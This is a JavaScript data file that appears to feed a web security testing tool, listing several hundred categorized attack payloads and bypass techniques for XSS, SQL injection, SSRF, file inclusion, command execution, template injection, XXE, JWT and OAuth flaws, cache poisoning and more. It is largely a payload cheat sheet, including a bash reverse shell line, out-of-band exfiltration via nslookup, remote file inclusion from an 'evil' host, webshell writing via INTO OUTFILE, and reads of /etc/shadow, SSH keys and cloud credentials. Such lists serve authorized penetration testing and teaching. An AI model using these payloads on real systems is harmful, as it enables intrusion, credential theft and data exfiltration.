// Technique knowledge base — 500+ advanced testing techniques / payloads /
// bypasses, tagged by category. Surfaced contextually by the HTTP analyzer and
// browsable in the Analyzer tab. Pure data.

const T = {
  xss: [
    'Reflect a unique canary (zxcq1) and grep the response to confirm reflection context.',
    'Break out of attribute: " onmouseover=alert(1) x="',
    'Break out of single-quoted attr: \' onfocus=alert(1) autofocus x=\'',
    'Script-tag context: </script><script>alert(1)</script>',
    'SVG payload: <svg onload=alert(1)>',
    'IMG onerror: <img src=x onerror=alert(1)>',
    'Body onload: <body onload=alert(1)>',
    'Details/ontoggle: <details open ontoggle=alert(1)>',
    'Iframe srcdoc: <iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">',
    'JS URI in href: javascript:alert(1)',
    'Event without parens (FF): <svg onload=alert`1`>',
    'Polyglot: jaVasCript:/*-/*`/*\\`/*\'/*"/**/(/* */oNcliCk=alert() )//',
    'DOM sink: location.hash into innerHTML — test #<img src=x onerror=alert(1)>',
    'Filter bypass: <scr<script>ipt>alert(1)</scr</script>ipt>',
    'Case bypass: <ScRiPt>alert(1)</ScRiPt>',
    'Null byte: <scri%00pt>alert(1)</script>',
    'Encoded brackets: %3Cscript%3Ealert(1)%3C/script%3E',
    'Double URL encode: %253Cscript%253E',
    'Unicode escape in JS context: \\u0061lert(1)',
    'HTML entity: &lt;img src=x onerror=alert(1)&gt; (test if decoded)',
    'Template literal: ${alert(1)} in JS template context',
    'Markdown XSS: [a](javascript:alert(1))',
    'CSS expression / style: <div style="background:url(javascript:alert(1))">',
    'Mutation XSS via innerHTML: <noscript><p title="</noscript><img src=x onerror=alert(1)>">',
    'AngularJS sandbox escape: {{constructor.constructor(\'alert(1)\')()}}',
    'Vue template injection: {{_c.constructor(\'alert(1)\')()}}',
    'JSONP callback: ?callback=alert(1)',
    'PostMessage XSS: send crafted message to window listener.',
    'DOM clobbering: <a id=x href="javascript:alert(1)"> to override globals.',
    'Stored XSS in filename / display name fields.',
    'XSS via Content-Type sniffing when text/plain echoed.',
    'data: URI: <a href="data:text/html,<script>alert(1)</script>">',
    'onerror in srcset / picture sources.',
    'XSS in SVG <use href> / <foreignObject>.',
    'WAF bypass: <img/src/onerror=alert(1)>',
    'WAF bypass: <svg><animate onbegin=alert(1) attributeName=x dur=1s>',
    'Backtick exec: <script>alert`1`</script>',
    'Comment break: --><script>alert(1)</script>',
    'Title break: </title><script>alert(1)</script>',
    'Textarea break: </textarea><script>alert(1)</script>',
    'Charset trick: set charset to UTF-7 if reflected (legacy).',
    'Reflected in href without scheme check -> //evil + onclick.',
    'XSS via cache deception (.css/.js path) serving HTML.',
    'Blind XSS: inject payload calling external collector (XSS Hunter style).',
    'CSP bypass: find allowed JSONP endpoint on whitelisted host.',
  ],
  sqli: [
    'Single quote probe: \' and observe error / 500.',
    'Boolean: \' OR \'1\'=\'1 vs \' OR \'1\'=\'2 (compare responses).',
    'Boolean numeric: 1 OR 1=1 / 1 OR 1=2.',
    'Time-based MySQL: 1 AND SLEEP(5)',
    'Time-based MySQL OR: 1 OR SLEEP(5)',
    'Time-based Postgres: 1; SELECT pg_sleep(5)--',
    'Time-based MSSQL: 1; WAITFOR DELAY \'0:0:5\'--',
    'Time-based Oracle: 1 AND 1=DBMS_PIPE.RECEIVE_MESSAGE(\'a\',5)',
    'Union: ORDER BY N to find column count.',
    'Union select nulls: UNION SELECT NULL,NULL,NULL--',
    'Version: UNION SELECT @@version / version()',
    'Current DB: UNION SELECT database()',
    'Tables: UNION SELECT table_name FROM information_schema.tables--',
    'Columns: UNION SELECT column_name FROM information_schema.columns--',
    'Error-based MySQL: extractvalue(1,concat(0x7e,version()))',
    'Error-based MySQL: updatexml(1,concat(0x7e,user()),1)',
    'Error-based MSSQL: convert(int,(select @@version))',
    'Stacked queries: 1; DROP TABLE x-- (where allowed).',
    'Comment styles: -- , #, /**/, --+',
    'Inline comment evasion: UN/**/ION SE/**/LECT',
    'WAF bypass: case + concat UnIoN(SeLeCt(1))',
    'WAF bypass: scientific notation 1.e(union...) ',
    'Quote bypass with hex: 0x61646d696e for \'admin\'',
    'CHAR() bypass: CHAR(97,100,109,105,110)',
    'Out-of-band MySQL: LOAD_FILE(CONCAT(\'\\\\\\\\\',(query),\'.collab\'))',
    'Out-of-band MSSQL: xp_dirtree to Burp Collaborator.',
    'Second-order: inject in profile field, trigger in another query.',
    'JSON SQLi: payload inside JSON body params.',
    'NoSQL Mongo: {"$gt":""} / {"$ne":null} auth bypass.',
    'NoSQL operator injection in JSON login.',
    'NoSQL where: \'; return true; var x=\'',
    'ORDER BY injection (no UNION) via CASE WHEN.',
    'Blind extraction with SUBSTRING + binary search.',
    'Bypass quotes with backslash in MySQL string context.',
    'sqlmap --level 5 --risk 3 --tamper=space2comment for confirmation.',
    'Header SQLi: inject in User-Agent / Referer / X-Forwarded-For.',
    'Cookie SQLi: inject in cookie values.',
    'Bypass 1=1 filter: 2-1=1 or 1 LIKE 1.',
    'GROUP BY / HAVING error oracle.',
    'INTO OUTFILE for webshell (MySQL, FILE priv).',
  ],
  ssrf: [
    'Point param at http://169.254.169.254/latest/meta-data/ (AWS IMDSv1).',
    'IMDSv2: try without token; if token required, look for SSRF + header control.',
    'GCP metadata: http://metadata.google.internal/computeMetadata/v1/ (Metadata-Flavor header).',
    'Azure IMDS: http://169.254.169.254/metadata/instance?api-version=2021-02-01',
    'Alibaba metadata: http://100.100.100.200/latest/meta-data/',
    'Localhost variants: 127.0.0.1, localhost, 0.0.0.0, [::1], 127.1, 0177.0.0.1',
    'Decimal IP: 2130706433 (=127.0.0.1).',
    'Hex IP: 0x7f000001.',
    'Octal IP: 0177.0000.0000.0001.',
    'IPv6: [::ffff:127.0.0.1], [0:0:0:0:0:ffff:127.0.0.1].',
    'DNS rebinding: domain that resolves to 127.0.0.1 after first lookup.',
    'Bypass with @: http://expected.com@127.0.0.1/',
    'Bypass with #: http://127.0.0.1#expected.com',
    'Bypass with ?: http://127.0.0.1?x=expected.com',
    'CRLF in URL to smuggle to internal service.',
    'Protocol smuggling: gopher:// to talk to Redis/SMTP.',
    'file:// to read local files.',
    'dict:// to enumerate internal ports/services.',
    'ftp:// for OOB exfil.',
    'Redirect-based SSRF: server follows 302 to internal.',
    'Open redirect chained to SSRF allowlist bypass.',
    'Blind SSRF: use Collaborator/interactsh to confirm.',
    'Port scan internal hosts via timing differences.',
    'Cloud bucket from SSRF: http://bucket.s3.amazonaws.com/',
    'Kubernetes API: https://10.0.0.1:443 / kubelet :10250.',
    'Docker socket via gopher to /var/run/docker.sock (if proxied).',
    'PDF/HTML renderer SSRF (wkhtmltopdf, headless chrome).',
    'Image/Webhook/Import URL fields are prime SSRF sinks.',
    'SVG SSRF: external entity / xlink:href to internal.',
    'Bypass allowlist with sub.expected.com.attacker.com.',
    'Bypass with trailing dot: 127.0.0.1.',
    'Mixed-case scheme: HtTp://',
    'Double URL encoding of the internal host.',
    'Use enclosed_alphanumerics / unicode dots (。) for host.',
    'SSRF to internal admin panels (Jenkins, Grafana, actuator).',
  ],
  lfi: [
    'Traversal: ../../../../etc/passwd',
    'Windows: ..\\..\\..\\windows\\win.ini',
    'Encoded: %2e%2e%2f%2e%2e%2fetc/passwd',
    'Double encode: %252e%252e%252f',
    'UTF-8 overlong: %c0%ae%c0%ae/',
    'Null byte (legacy PHP): ../../etc/passwd%00',
    'Path truncation with long ../ chains.',
    'PHP filter read source: php://filter/convert.base64-encode/resource=index.php',
    'PHP filter chains for RCE (php_filter_chain_generator).',
    'data:// wrapper: data://text/plain;base64,PD9waHA...',
    'expect:// wrapper for command exec.',
    'php://input with POST body as code.',
    'zip:// / phar:// wrappers.',
    'Log poisoning: inject PHP into User-Agent, include /var/log/apache2/access.log.',
    '/proc/self/environ poisoning.',
    '/proc/self/fd/N file descriptors.',
    'Read /etc/passwd, /etc/shadow, /etc/hosts.',
    'Read app config: .env, config.php, wp-config.php.',
    'Read SSH keys: /root/.ssh/id_rsa, /home/user/.ssh/id_rsa.',
    'Read cloud creds: ~/.aws/credentials.',
    'Windows: c:\\windows\\system32\\drivers\\etc\\hosts.',
    'Windows SAM: c:\\windows\\repair\\sam.',
    'IIS web.config disclosure.',
    'Wrapper bypass of extension append (.php) via filter.',
    'Absolute path bypass when ../ stripped: /etc/passwd.',
    'Bypass "../" filter with "....//".',
    'Bypass with "..%2f" mixed.',
    'Nginx misconfig alias traversal (/static../).',
    'Java path traversal in getResource / ZipSlip on upload.',
    'RFI (if allow_url_include): ?file=http://evil/shell.txt',
  ],
  rce: [
    'Command separators: ; | & && || `cmd` $(cmd) %0a',
    'Confirm with: ;sleep 5 (timing) or ;id.',
    'Blind OOB: ;nslookup $(whoami).collab',
    'Windows: & ping -n 5 127.0.0.1',
    'Windows: | whoami',
    'Bypass space: ${IFS} or {cat,/etc/passwd} or <',
    'Bypass space: cat$IFS$9/etc/passwd',
    'Quote bypass: w\'h\'o\'a\'m\'i',
    'Concatenation: /bin/c""at /etc/passwd',
    'Base64 exec: echo <b64>|base64 -d|bash',
    'Argument injection (e.g. -o ProxyCommand in ssh, --use-askpass).',
    'Wildcard injection (tar checkpoint, rsync -e).',
    'PHP: system(), exec(), passthru(), shell_exec(), `backticks`.',
    'PHP code eval: ?x=phpinfo(); via eval sinks.',
    'PHP preg_replace /e modifier (legacy).',
    'Python: __import__("os").system("id")',
    'Python pickle deserialization RCE.',
    'Python format string -> attribute access.',
    'Node: child_process.exec sink; require("child_process").',
    'Node prototype pollution -> RCE gadget.',
    'Ruby: `system`, Open3, ERB template injection.',
    'Java: Runtime.getRuntime().exec; ProcessBuilder.',
    'Java EL / OGNL injection (Struts).',
    'Log4Shell: ${jndi:ldap://collab/a} in any logged input.',
    'Spring4Shell: class.module.classLoader... binding.',
    'Template engines -> RCE (see SSTI techniques).',
    'CSV/Formula injection to local exec (DDE) in spreadsheets.',
    'XSLT extension function exec.',
    'ImageMagick (ImageTragick) MVG/MSL exploits.',
    'Ghostscript / FFmpeg SSRF+RCE via crafted files.',
    'Bypass blacklist: $@ , ${} , character insertion in keywords.',
    'Reverse shell: bash -i >& /dev/tcp/IP/PORT 0>&1',
    'Use env var leak then chained exec.',
    'Chained: command injection in filename during upload processing.',
  ],
  ssti: [
    'Detect with ${7*7} {{7*7}} #{7*7} <%=7*7%> — look for 49.',
    'Differentiate engine with {{7*\'7\'}} (7777777=Jinja, 49=Twig).',
    'Jinja2 RCE: {{config.__class__.__init__.__globals__[\'os\'].popen(\'id\').read()}}',
    'Jinja2: {{cycler.__init__.__globals__.os.popen(\'id\').read()}}',
    'Jinja2: {{lipsum.__globals__.os.popen(\'id\').read()}}',
    'Jinja2 request leak: {{request.application.__globals__}}',
    'Jinja2 bypass filters: {{ ()["__cl"+"ass__"] }}',
    'Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}',
    'Twig: {{[\'id\']|filter(\'system\')}}',
    'Smarty: {php}system(\'id\');{/php}',
    'Smarty: {system(\'id\')} / {self::getStreamVariable("file:///etc/passwd")}',
    'Freemarker: <#assign x="freemarker.template.utility.Execute"?new()>${x("id")}',
    'Velocity: #set($e=$x.class.forName("java.lang.Runtime")...) exec.',
    'Mako: ${__import__(\'os\').system(\'id\')}',
    'Pug/Jade: #{root.process.mainModule.require(\'child_process\').execSync(\'id\')}',
    'Handlebars prototype pollution -> RCE gadget.',
    'Nunjucks: {{range.constructor("return global.process.mainModule.require(\'child_process\').execSync(\'id\')")()}}',
    'ERB (Ruby): <%= `id` %>',
    'Razor (.NET): @{ ... } code blocks.',
    'Thymeleaf: __${T(java.lang.Runtime).getRuntime().exec(\'id\')}__',
    'Detect blind SSTI via timing in template render.',
    'Bypass keyword filters with attribute access [].',
    'Use |attr() and request args to smuggle blocked words (Jinja).',
    'Escape sandbox via __subclasses__ enumeration.',
    'Find file-read gadget when exec is blocked.',
    'Chain SSTI from a stored field rendered server-side (emails, PDFs).',
    'Math probe across params to locate the injectable one.',
    'CSV/Spreadsheet template injection in export features.',
  ],
  xxe: [
    'Basic: <!DOCTYPE x [<!ENTITY e SYSTEM "file:///etc/passwd">]><r>&e;</r>',
    'Parameter entity OOB: <!ENTITY % p SYSTEM "http://collab/">%p;',
    'Blind OOB exfil via external DTD.',
    'PHP wrapper: php://filter/convert.base64-encode/resource=/etc/passwd inside entity.',
    'Billion laughs (DoS) — use cautiously / only with permission.',
    'XInclude when DOCTYPE blocked: <x xmlns:xi="..."><xi:include href="file:///etc/passwd"/></x>',
    'SVG XXE on image upload.',
    'DOCX/XLSX/PPTX contain XML — inject XXE in document.xml.',
    'SOAP/WSDL endpoints often XXE-prone.',
    'SAML response XXE.',
    'Content-Type swap to application/xml on JSON endpoints.',
    'Error-based XXE to leak file content in error message.',
    'UTF-16/UTF-7 encoded XML to bypass filters.',
    'Local DTD reuse (existing system DTD) to trigger errors with file content.',
    'XXE to SSRF (http:// entity to internal).',
    'jar:// protocol for file read (Java).',
    'expect:// via XXE (PHP) for RCE.',
    'Nested entities to bypass naive filters.',
  ],
  redirect: [
    'Whitelisted-prefix bypass: https://trusted.com.evil.com',
    'Backslash trick: https://trusted.com\\@evil.com',
    'Double slash: //evil.com',
    'Triple slash: ///evil.com',
    'Whitespace: https://evil.com%09 or %0d%0a',
    '@ bypass: https://trusted.com@evil.com',
    'Path-relative: /\\evil.com',
    'Encoded scheme: https:%2f%2fevil.com',
    'Missing scheme: evil.com -> browser prepends.',
    'data: URI redirect for XSS.',
    'javascript: scheme in redirect for XSS.',
    'CRLF in redirect param for header injection.',
    'Open redirect to steal OAuth code/token (redirect_uri).',
    'Redirect param chained into SSRF allowlist.',
    'Unicode dot/slash homoglyphs in host.',
    'Parameter pollution: ?url=trusted&url=evil.',
    'Fragment smuggling: #@evil.com.',
    'Bypass with uppercase scheme HTTPS://.',
  ],
  auth: [
    'JWT alg:none — strip signature, set "alg":"none".',
    'JWT alg confusion RS256->HS256 using public key as HMAC secret.',
    'JWT weak HMAC secret — crack with hashcat/jwt_tool wordlist.',
    'JWT kid injection: path traversal / SQLi in kid header.',
    'JWT jku/x5u SSRF to attacker-hosted JWKS.',
    'JWT jwk header embeds attacker public key (CVE-class).',
    'JWT expired (exp) still accepted — replay test.',
    'JWT no signature verification on server.',
    'JWT claim tampering: sub/role/admin=true.',
    'JWT crit header bypass.',
    'Session fixation: set known session before login.',
    'Session not rotated after login/privilege change.',
    'Cookie without Secure/HttpOnly/SameSite.',
    'Predictable session tokens (low entropy).',
    'Remember-me token reuse / no expiry.',
    'OAuth: open redirect in redirect_uri to steal code.',
    'OAuth: missing state -> CSRF on callback.',
    'OAuth: code reuse / no PKCE.',
    'OAuth: token leak via Referer.',
    'OAuth: implicit flow token in URL fragment.',
    'SAML: signature stripping / XSW (XML signature wrapping).',
    'SAML: comment injection in NameID.',
    'Password reset token: predictable / no expiry / reuse.',
    'Password reset: host header poisoning to steal token.',
    'Password reset: email parameter pollution.',
    'Account takeover via email change without re-auth.',
    '2FA bypass: skip step / direct object to post-2FA page.',
    '2FA: response manipulation (success:false->true).',
    '2FA: code brute force (no rate limit).',
    '2FA: reuse of OTP / backup codes.',
    'Auth bypass via verb tampering (GET vs POST).',
    'Auth bypass via path case / trailing slash / %2e.',
    'Forced browsing to authenticated endpoints.',
    'Basic auth creds in JS / git history.',
    'Default credentials on admin panels.',
    'Login rate-limit bypass via X-Forwarded-For rotation.',
    'Username enumeration via response/time differences.',
    'Mass assignment of role/isAdmin during signup.',
    'JWT stored in localStorage -> XSS theft.',
    'Cookie scope too broad (Domain=.target.com) across subdomains.',
    'Logout doesn\'t invalidate server session.',
    'Concurrent session / no device management.',
    'Magic link reuse / no single-use enforcement.',
    'Step-up auth missing on sensitive actions.',
    'Token in URL leaks via logs/Referer.',
  ],
  cors: [
    'Reflected Origin: ACAO echoes any Origin + ACAC:true -> creds theft.',
    'Null origin allowed: Origin: null (sandboxed iframe).',
    'Wildcard ACAO with credentials (invalid but test behavior).',
    'Subdomain trust: evil.target.com if *.target.com allowed.',
    'Pre-domain bypass: targetcorp.com.evil.com.',
    'Post-domain bypass: target.com.evil.com.',
    'Substring match flaw: nottarget.com.',
    'Trailing dot / case in Origin.',
    'http vs https origin acceptance.',
    'ACAO reflects without validating port.',
    'Test with non-CORS-safelisted headers (preflight).',
    'Cache poisoning of CORS headers.',
    'Internal-only API with permissive CORS.',
    'Exfil sensitive JSON via fetch with credentials:include.',
  ],
  csrf: [
    'Missing CSRF token on state-changing POST.',
    'Token not validated server-side (remove it).',
    'Token not tied to session (use another user\'s token).',
    'GET-based state change (CSRF via img/link).',
    'SameSite=None cookie enables cross-site.',
    'JSON CSRF via text/plain content-type + form.',
    'Method override (_method=PUT) in form.',
    'Referer-based protection bypass (omit Referer).',
    'CSRF on login (login CSRF) to fixate account.',
    'Token leak via Referer to third party.',
    'Double-submit cookie flaw (predictable cookie).',
    'CSRF on password/email change = ATO.',
    'Flash/CORS-based CSRF on legacy endpoints.',
    'Clickjacking when X-Frame-Options/CSP frame-ancestors missing.',
  ],
  idor: [
    'Increment/decrement numeric IDs (id=1001 -> 1000).',
    'UUID swap from another account.',
    'Negative / zero IDs.',
    'Array/wrapping: id[]=1&id[]=2.',
    'Switch HTTP method (GET allowed where POST authz).',
    'Mass-assign owner_id / user_id in body.',
    'IDOR in nested JSON (account.id).',
    'IDOR via predictable filenames / S3 keys.',
    'IDOR in export/download endpoints.',
    'IDOR via GraphQL node(id:) global IDs.',
    'IDOR in batch endpoints (ids: [..]).',
    'IDOR after role change (horizontal -> vertical).',
    'Replace email/username param with victim\'s.',
    'Tenant isolation bypass (org_id swap).',
    'Hashids/encoded IDs that are reversible.',
    'IDOR in webhooks / callback config.',
    'Second-order IDOR (set now, accessed later).',
    'IDOR via referer/host trusted for ownership.',
  ],
  headers: [
    'Missing Strict-Transport-Security (HSTS).',
    'Missing Content-Security-Policy.',
    'Weak CSP: unsafe-inline / unsafe-eval / * sources.',
    'CSP allows data: / blob: in script-src.',
    'Missing X-Content-Type-Options: nosniff.',
    'Missing X-Frame-Options / frame-ancestors -> clickjacking.',
    'Missing Referrer-Policy -> token leak via Referer.',
    'Permissions-Policy not set (camera/mic/geolocation).',
    'Server / X-Powered-By version disclosure.',
    'X-AspNet-Version / X-AspNetMvc-Version leak.',
    'Cache-Control missing on sensitive pages (no-store).',
    'Set-Cookie without Secure.',
    'Set-Cookie without HttpOnly.',
    'Set-Cookie SameSite missing/None without Secure.',
    'Cookie __Host-/__Secure- prefix misuse.',
    'Access-Control-Allow-Origin: * on authed API.',
    'CORS ACAC:true with reflected origin.',
    'Verbose error pages / stack traces.',
    'Debug headers (X-Debug, X-Runtime) leak internals.',
    'X-Forwarded-* trusted from client.',
    'Host header reflected in links/cache.',
    'Missing Cross-Origin-Resource-Policy.',
    'Missing Cross-Origin-Opener-Policy.',
    'Missing Cross-Origin-Embedder-Policy.',
    'Content-Type missing charset -> sniffing.',
    'Insecure Content-Type (text/html for API JSON).',
    'ETag/Last-Modified info leak (inode / timing).',
    'Allow header reveals methods (verb tampering).',
    'WWW-Authenticate reveals internal realm.',
    'Cache key not including auth -> shared cached responses.',
  ],
  upload: [
    'Double extension: shell.php.jpg / shell.jpg.php.',
    'Null byte: shell.php%00.jpg (legacy).',
    'Content-Type spoof: image/jpeg with PHP body.',
    'Magic bytes prefix (GIF89a;) + code.',
    'Case bypass: .PhP / .pHtml / .phtml / .phar / .pht.',
    'Alternative exec exts: .asp;.jpg, .aspx, .jsp, .jspx.',
    'SVG upload -> stored XSS / XXE.',
    'HTML upload served inline -> XSS.',
    '.htaccess upload to enable code exec.',
    'web.config upload (IIS) for handler mapping.',
    'Path traversal in filename: ../../shell.php.',
    'ZipSlip: ../ inside archive on extraction.',
    'Symlink in archive to read host files.',
    'Polyglot file (valid image + code).',
    'EXIF metadata code injection.',
    'ImageTragick via crafted MVG/MSL.',
    'PDF JS / SSRF via crafted PDF.',
    'Filename XSS (stored) in listing pages.',
    'Overwrite existing files (avatar -> config).',
    'Race condition: access file before AV scan/delete.',
    'Unrestricted size -> DoS.',
    'Bypass MIME check by reordering multipart parts.',
    'Use trailing dot/space in filename (Windows).',
    'Content-Disposition filename injection.',
    'SSRF via "upload from URL" feature.',
    'Bypass extension allowlist with %00 / unicode.',
  ],
  deserialization: [
    'Java: detect rO0AB / ac ed 00 05 magic; use ysoserial gadgets.',
    'Java: CommonsCollections / Spring / Hibernate gadget chains.',
    '.NET: detect AAEAAAD; use ysoserial.net (TypeConfuseDelegate).',
    '.NET ViewState __VIEWSTATE without MAC -> RCE.',
    'PHP: detect O:8: serialized objects; craft __wakeup/__destruct gadget.',
    'PHP phar:// deserialization on file ops.',
    'Python pickle: detect base64 of \\x80; RCE via __reduce__.',
    'Python PyYAML !!python/object/apply gadget.',
    'Ruby Marshal.load gadget chains.',
    'Node node-serialize IIFE _$$ND_FUNC$$_.',
    'JSON deserialization type confusion (Jackson polymorphic).',
    'Jackson @class / enableDefaultTyping gadget.',
    'XMLDecoder (Java) arbitrary object creation.',
    'Detect via length/format then send gadget to OOB.',
    'Blind: confirm with DNS/sleep gadget before full RCE.',
  ],
  race: [
    'Limit-overrun: send N parallel requests to redeem coupon/withdraw once.',
    'Use single-packet attack (HTTP/2) for tight timing.',
    'Turbo Intruder race template.',
    'Double-spend on payment/balance endpoints.',
    'Multi-use of single-use tokens (OTP, reset, invite).',
    'Concurrent signup with same email/username.',
    'TOCTOU on file/state checks.',
    'Bypass rate limit via parallelism.',
    'Inconsistent state in multi-step flows.',
    'Cart/price race during checkout.',
  ],
  logic: [
    'Negative quantity / price to gain credit.',
    'Currency / decimal rounding abuse.',
    'Coupon stacking / reuse beyond limit.',
    'Skip payment step (force browse to success URL).',
    'Modify price in client request.',
    'Change product ID after price calc.',
    'Apply refund without return.',
    'Bypass workflow steps (state not enforced server-side).',
    'Reuse of one-time discounts.',
    'Privilege escalation via hidden parameters.',
    'Tamper with quantity to integer overflow.',
    'Free trial abuse via email aliasing.',
    'Loyalty point manipulation.',
    'Gift card brute force / enumeration.',
    'Order someone else\'s cart (IDOR + logic).',
    'Bypass max-attempt by changing identifier.',
    'Time-of-check pricing vs checkout.',
    'Abuse referral self-invite.',
    'Subscription downgrade keeping premium features.',
    'Tamper with shipping cost / tax.',
  ],
  ratelimit: [
    'Rotate X-Forwarded-For / X-Real-IP / X-Client-IP.',
    'Add port to IP (1.2.3.4:1) to bypass per-IP.',
    'Case/encoding of endpoint path to dodge key.',
    'Use different HTTP versions / methods.',
    'Add trailing slash / %2e to change limiter key.',
    'Distribute via parallelism before window resets.',
    'Bypass with X-Forwarded-Host / X-Original-URL.',
    'Reset counter via different casing of username.',
    'Use array params to multiply attempts.',
    'Find unlimited internal/legacy endpoint variant.',
    'Bypass via GraphQL batching (many ops one request).',
    'Null/whitespace in identifier resets bucket.',
  ],
  graphql: [
    'Introspection: query{__schema{types{name}}} — dump schema.',
    'If introspection off, use field suggestions / clairvoyance.',
    'Batching: send array of queries to bypass rate limit/2FA.',
    'Alias-based brute force (login(alias) x1000 in one request).',
    'Deeply nested query for DoS.',
    'Field-level authz: access sensitive fields on objects.',
    'IDOR via node(id:) global IDs.',
    'Mutation without authz (deleteUser, promote).',
    'Introspection enabled in production.',
    'CSRF on GraphQL via GET / form-encoded.',
    'SQLi/NoSQLi in GraphQL arguments.',
    'SSRF via GraphQL url arguments.',
    'Information disclosure via error messages.',
    'Bypass disabled introspection via __type probing.',
    'Query cost / depth limit missing.',
    'Persisted query bypass.',
    'Use fragments to dodge field filters.',
    'Directives abuse (@skip/@include) for logic bypass.',
    'Mutation chaining for state abuse.',
    'Leak PII via connection edges/nodes.',
    'Auth via query while mutation unprotected (or vice versa).',
    'Test both GET and POST transport.',
  ],
  api: [
    'BOLA/IDOR on /api/{id} across users.',
    'BFLA: call admin function as low-priv user.',
    'Mass assignment of protected fields (role, verified).',
    'Excessive data exposure (full object returned).',
    'Missing rate limit on auth/OTP.',
    'Verb tampering: PUT/PATCH/DELETE on read endpoints.',
    'Old API version (/v1) without fixes.',
    'Undocumented endpoints from JS / swagger / openapi.json.',
    'Swagger UI / GraphiQL exposed.',
    'Improper assets management (staging API).',
    'JWT/Key in query string.',
    'Content-Type confusion (XML accepted -> XXE).',
    'HTTP method override header (X-HTTP-Method-Override).',
    'Pagination abuse to dump all records.',
    'Inconsistent authz between web and mobile API.',
    'CORS misconfig on API.',
    'Injection in filter/sort/search params.',
    'Webhook SSRF / no signature verification.',
    'Replay of signed requests (no nonce/timestamp).',
    'GraphQL/REST shadow APIs.',
    'Improper error handling leaking stack/SQL.',
    'Bulk endpoints bypassing per-item checks.',
  ],
  bypass403: [
    'Path case: /Admin /ADMIN.',
    'Trailing slash: /admin/ vs /admin.',
    'Path append: /admin/. , /admin/..;/',
    'Encoded: /%2e/admin , /admin%20 , /admin%09.',
    'Double encode: /%252e/admin.',
    'Add ;/ : /admin;/',
    'Add /./ or //: /./admin , //admin.',
    'Header X-Original-URL: /admin.',
    'Header X-Rewrite-URL: /admin.',
    'Header X-Forwarded-For: 127.0.0.1.',
    'Header X-Custom-IP-Authorization: 127.0.0.1.',
    'Header Referer: trusted internal.',
    'Method change: POST/HEAD/OPTIONS instead of GET.',
    'HTTP/1.0 vs HTTP/2 differences.',
    'Add extension: /admin.json /admin;.css.',
    'Unicode/overlong path chars.',
    'Wildcard host / Host header swap.',
    'Use index file directly (/admin/index.php).',
    'Wayback/older path that bypasses new ACL.',
    'CDN vs origin discrepancy (hit origin IP directly).',
    'Add null/%00 to path.',
    'Use ..%2f to reach protected path from allowed one.',
  ],
  cache: [
    'Unkeyed header reflected in body -> web cache poisoning.',
    'X-Forwarded-Host poisoning of cached links/scripts.',
    'X-Forwarded-Scheme / X-Forwarded-Proto poisoning.',
    'Unkeyed query param poisoning.',
    'Fat GET (body on GET) cache discrepancy.',
    'Cache deception: /account/foo.css served + cached as user data.',
    'Parameter cloaking (;) to desync cache key.',
    'Host header in cache key vs origin.',
    'Cache poisoning via User-Agent/Accept-Language.',
    'Normalize-then-cache discrepancies (//, /./).',
    'Cache key injection via case sensitivity.',
    'Poison error pages (404 cached with payload).',
    'Vary header missing on personalized content.',
    'CDN cache TTL abuse for persistence.',
    'Edge vs origin path normalization mismatch.',
    'Cookie not in cache key -> session leak.',
  ],
  hosthdr: [
    'Host: evil.com reflected -> poisoning / SSRF.',
    'Duplicate Host headers (which one used?).',
    'Absolute URL in request line GET http://evil/.',
    'X-Forwarded-Host: evil.com.',
    'X-Host / X-Forwarded-Server overrides.',
    'Host header password reset poisoning.',
    'Host header in cache key for poisoning.',
    'Host header routing to internal vhost.',
    'Host: localhost to reach internal app.',
    'Host header injection into emails/links.',
    'SNI vs Host mismatch.',
    'Port in Host (evil.com:80) bypass.',
    'Underscore/case host variants.',
    'Host header SSRF to cloud metadata.',
    'Override via Forwarded: host=evil.',
    'Bypass vhost ACL with Host of internal app.',
  ],
};

export const TECHNIQUE_CATEGORIES = Object.keys(T);
export const TECHNIQUES = Object.entries(T).flatMap(([cat, arr]) => arr.map((t) => ({ cat, t })));
export const TECHNIQUE_COUNT = TECHNIQUES.length;
